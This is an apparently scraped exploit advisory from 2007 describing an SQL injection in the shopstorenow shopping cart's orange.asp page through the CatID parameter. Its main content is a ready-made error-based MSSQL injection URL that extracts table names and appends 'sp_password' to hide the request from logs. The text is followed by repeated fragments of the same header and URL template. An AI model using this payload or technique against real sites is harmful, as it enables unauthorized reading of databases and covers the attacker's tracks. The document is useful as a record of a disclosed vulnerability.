shopstorenow (orange.asp) sql injection

2007-01-0700:00:00

vulners.com

============================= HItamputih Crew ====================
#hitamputih Advisory
##Discovered By : IbnuSina
#-----------------------------------------------------------
#Software: shopstorenow E-commerce Shopping Cart
#Method: SQL Injection

[[SQL]]]---------------------------------------------------------
http://[target]/[path]//orange.asp?CatID=[SQL]

ex:

http://[target]/[path]//orange.asp?CatID=1'%20and%201=convert(int,(select%20top%201%20table_name%20from%20information_schema.tables))–sp_password

#########################################################################################

JSON

shopstorenow &#40;orange.asp&#41; sql injection

[[SQL]]]--------------------------------------------------------- http://[target]/[path]//orange.asp?CatID=[SQL]

shopstorenow (orange.asp) sql injection

[[SQL]]]---------------------------------------------------------
http://[target]/[path]//orange.asp?CatID=[SQL]